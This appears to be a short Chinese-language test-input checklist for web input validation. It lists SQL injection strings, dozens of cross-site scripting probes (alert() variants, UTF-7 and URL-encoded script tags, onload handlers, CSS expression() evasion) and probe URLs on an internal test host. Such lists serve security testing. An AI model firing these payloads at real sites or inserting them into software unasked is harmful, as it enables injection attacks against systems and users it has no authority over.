|
空
空格若干
超长字符串
脏数据
带html标签的内容
SQL 注入:
' go select @@version --
' go select * from identifier --
'; go select * from identifier --
JS:
\')-alert()-(\'var=\'
\')-alert()-(\'
')-alert()-('var='
')-alert()-('
')*alert()*('
javascript:alert()
+ADw-/script+AD4APA-script+AD4-alert()+ADw-/script+AD4-
+ADw-SCRIPT+AD4-alert();+ADw-/SCRIPT+AD4-
'+-alert()+-'
\'*alert()*\'
'*alert()*'
'-eval(alert())-'
-eval(alert())-
'+eval(alert())+'
+eval(alert())+
'%2Beval(alert())%2B'
%2Beval(alert())%2B
javascript:alert();
onload=alert()
onload='alert()'
onload="alert()"
%u003c%u002fscript%u003e%u003cscript%u003ealert%u0028%u0029%u003c%u002fscript%u003e
%26%2359alert%26%2340%26%2341%26%2359%26%2347%26%2347
显示链接等:
http://officesectest/tools/xssprobev2/exploit.jpg
http://officesectest/tools/xssprobev2/exploit.js
http://officesectest/tools/xssprobev2/exploit.swf
http://officesectest/tools/xssprobev2/exploit.png
http://officesectest/tools/xssprobev2/pngexploit.jpg
其他:
}body{w:expres/**/sion(alert())}/*
ZZ ADw-/script AD4APA-script AD4-alert() ADw-/script AD4-ZZ
a stystyle=le=w:expres/**/sion(alert()) a
'/stystyle=le='w:expres/**/sion(alert())'/'"/stystyle=le="w:expres/**/sion(alert())"/"
background:expression(alert((parseInt("hi;width:")==NaN)?"":""));
background:expression(alert((parseInt('hi;width:')==NaN)?'':'')); |
|